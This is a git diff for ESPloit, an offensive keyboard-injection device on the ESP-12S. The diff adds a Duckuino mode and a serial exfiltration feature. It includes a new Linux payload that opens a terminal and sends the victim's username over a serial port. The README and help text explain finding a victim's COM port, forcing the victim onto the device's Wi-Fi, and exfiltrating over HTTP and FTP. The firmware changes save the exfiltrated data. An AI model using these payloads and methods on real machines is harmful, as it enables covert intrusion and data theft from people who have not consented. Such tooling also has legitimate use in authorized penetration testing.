diff --git a/README.md b/README.md index 2c789a1..610db12 100644 --- a/README.md +++ b/README.md @@ -70,7 +70,9 @@ You are now greeted with the main menu of ESPloit. From here there are several o Upload Payload: Upload a payload.txt file Choose Payload: Choose a payload to run Live Payload Mode: Type out or copy/paste a payload to run without uploading +Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script Input Mode: Use the device as a keyboard/mouse substitute +List Exfiltrated Data: Lists any exfiltrated data Configure ESPloit: Configure WiFi and basic settings Format File System: Format the file system Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser @@ -236,16 +238,24 @@ Live Payload Mode Here you may type out or copy/paste a payload to run without uploading. ----- -List Exfiltrated Data +Input Mode ----- -Displays any data that has been collected from the victim using ESPloit's exfiltration methods. +Use the device as a keyboard/mouse substitute. + +----- +Duckuino Mode +----- + +Convert Ducky Script to ESPloit Script and then optionally run the script. +Paste Ducky Script on the text area to the left. +Click convert and the ESPloit compatible script appears on the right. ----- -Input Mode +List Exfiltrated Data ----- -Use the device as a keyboard/mouse substitute. +Displays any data that has been collected from the victim using ESPloit's exfiltration methods. ----- Format File System @@ -275,7 +285,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and Exfiltrating Data ----- -To exfiltrate data be sure ESPloit and Target machine are on the same network. +Serial Exfiltration Method: +Find the victims com port +Set the baud rate to 38400 +Send the text "SerialEXFIL:" followed by the data to exfiltrate +Exfiltrated data will be saved to the file SerialEXFIL.txt +See the example payloads for more info + +WiFi Exfiltration Methods: +To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network. Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP. Example commands to force victim to connect to ESPloit's network(when set as AP): diff --git a/payloads/LinSerialEXFIL.txt b/payloads/LinSerialEXFIL.txt new file mode 100644 index 0000000..963d39d --- /dev/null +++ b/payloads/LinSerialEXFIL.txt @@ -0,0 +1,5 @@ +Rem: Exfiltrate UserName from Linux Box using a Serial Link +Press:134+195 +PrintLine:gnome-terminal +CustomDelay:1000 +PrintLine:stty -F /dev/ttyACM0 38400;echo "SerialEXFIL:"$(whoami) > /dev/ttyACM0 \ No newline at end of file diff --git a/source/ESP_Code/Duckuino.h b/source/ESP_Code/Duckuino.h index 69133f5..07a9d6e 100644 --- a/source/ESP_Code/Duckuino.h +++ b/source/ESP_Code/Duckuino.h @@ -102,6 +102,9 @@ menu a.hoverable:hover {
+ +<- BACK + Convert @@ -112,7 +115,7 @@ Run Payload
- +
diff --git a/source/ESP_Code/ESP_Code.ino b/source/ESP_Code/ESP_Code.ino index 20b5110..aa43f63 100644 --- a/source/ESP_Code/ESP_Code.ino +++ b/source/ESP_Code/ESP_Code.ino @@ -604,7 +604,7 @@ void ListPayloads(){ String FileList = "<- BACK TO INDEX

"; Dir dir = SPIFFS.openDir(directory); if(server.uri() == "/listpayloads") FileList += "File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Upload Payload

Live Payload Mode

"; - if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.
Current Network Configuration: ESPloit's IP= ")+local_IPstr+" SSID = "+ssid+" PASSWORD = "+password+"
Windows: netsh wlan set hostednetwork mode=allow ssid=\""+ssid+"\" key=\""+password+"\"
Linux: nmcli dev wifi connect "+ssid+" password "+password+"

For HTTP exfiltration method point the target machine to the url listed below:
http://"+local_IPstr+"/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE
For FTP exfiltration method use the credentials listed below:
Server: "+local_IPstr+" Username: "+ftp_username+" Password: "+ftp_password+"
See the example payloads for more in depth examples.

File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Display Payload ContentsSize in BytesRun PayloadDownload FileDelete Payload
"; + if(server.uri() == "/exfiltrate/list") FileList += String()+F("To exfiltrate data using the serial method find the com port device is connected to
then be sure to set the baud rate to 38400 on the victim machine
and send the text \"SerialEXFIL:\" followed by the data to exfiltrate.
To exfiltrate data using the WiFi methods be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.
Current Network Configuration: ESPloit's IP= ")+local_IPstr+" SSID = "+ssid+" PASSWORD = "+password+"
Windows: netsh wlan set hostednetwork mode=allow ssid=\""+ssid+"\" key=\""+password+"\"
Linux: nmcli dev wifi connect "+ssid+" password "+password+"

For HTTP exfiltration method point the target machine to the url listed below:
http://"+local_IPstr+"/exfiltrate?file=FILENAME.TXT&data=EXFILTRATED-DATA-HERE
For FTP exfiltration method use the credentials listed below:
Server: "+local_IPstr+" Username: "+ftp_username+" Password: "+ftp_password+"
See the example payloads for more in depth examples.

File System Info Calculated in Bytes
Total: "+total+" Free: "+freespace+" "+" Used: "+used+"

Display File ContentsSize in BytesDownload FileDelete File
"; while (dir.next()) { String FileName = dir.fileName(); File f = dir.openFile("r"); @@ -1162,7 +1162,14 @@ void loop() { if(cmd == "Version"){ ardversion = Serial.readStringUntil('\n'); } + if(cmd == "SerialEXFIL"){ + String SerialEXFIL = Serial.readStringUntil('\n'); + File f = SPIFFS.open("/SerialEXFIL.txt", "a"); + f.println(SerialEXFIL); + f.close(); + } } + //Serial.print("Free heap-"); //Serial.println(ESP.getFreeHeap(),DEC); } diff --git a/source/ESP_Code/ESP_Code.ino.generic.bin b/source/ESP_Code/ESP_Code.ino.generic.bin index b13d803..033b80a 100644 Binary files a/source/ESP_Code/ESP_Code.ino.generic.bin and b/source/ESP_Code/ESP_Code.ino.generic.bin differ diff --git a/source/ESP_Code/HelpText.h b/source/ESP_Code/HelpText.h index 75505f2..64027a3 100644 --- a/source/ESP_Code/HelpText.h +++ b/source/ESP_Code/HelpText.h @@ -74,7 +74,9 @@ Upload Payload: Upload a payload.txt file
Choose Payload: Choose a payload to run
Live Payload Mode: Type out or copy/paste a payload to run without uploading
Input Mode: Use the device as a keyboard/mouse substitute
+Duckuino Mode: Convert and optionally run Ducky Script payloads to ESPloit compatible script
Configure ESPloit: Configure WiFi and basic settings
+List Exfiltrated Data: Lists any exfiltrated data
Format File System: Format the file system
Upgrade ESPloit Firmware: Upgrade the ESP-12S ESPloit firmware from a web browser
Help: Brings up this help file
@@ -144,7 +146,7 @@ Scripting a Payload
-----

ESPloit uses its own scripting language and not Ducky Script,
-although a Ducky Script to ESPloit converter is available at: https://exploitagency.github.io/Duckuino/index.html
+although a Ducky Script to ESPloit converter is available in the Duckuino Mode page

Examples of ESPloit's scripting language can be seen below.

@@ -239,16 +241,24 @@ Live Payload Mode
Here you may type out or copy/paste a payload to run without uploading.

-----
-List Exfiltrated Data
+Input Mode
-----

-Displays any data that has been collected from the victim using ESPloit's exfiltration methods.
+Use the device as a keyboard/mouse substitute.

-----
-Input Mode
+Duckuino Mode
-----

-Use the device as a keyboard/mouse substitute.
+Convert Ducky Script to ESPloit Script and then optionally run the script.
+Paste Ducky Script on the text area to the left.
+Click convert and the ESPloit compatible script appears on the right.
+
+-----
+List Exfiltrated Data
+-----
+
+Displays any data that has been collected from the victim using ESPloit's exfiltration methods.

-----
Format File System
@@ -278,7 +288,15 @@ If you are using this mode to swap the firmware loaded on the ESP-12S chip, and Exfiltrating Data
-----

-To exfiltrate data be sure ESPloit and Target machine are on the same network.
+Serial Exfiltration Method:
+Find the victims com port
+Set the baud rate to 38400 on victim machine
+Send the text "SerialEXFIL:" followed by the data to exfiltrate
+Exfiltrated data will be saved to the file SerialEXFIL.txt
+See the example payloads for more info
+
+WiFi Exfiltration Methods:
+To exfiltrate data using WiFi methods be sure ESPloit and Target machine are on the same network.
Either set ESPloit to join the Target's network or set the Target to join ESPloit's AP.

Example commands to force victim to connect to ESPloit's network(when set as AP):
diff --git a/source/ESP_Code/version.h b/source/ESP_Code/version.h index 12e8447..7f392a9 100644 --- a/source/ESP_Code/version.h +++ b/source/ESP_Code/version.h @@ -1,2 +1,2 @@ -String version = "2.6.1337"; +String version = "2.7.331"; String latestardversion = "2.2";
Display File ContentsSize in BytesDownload FileDelete File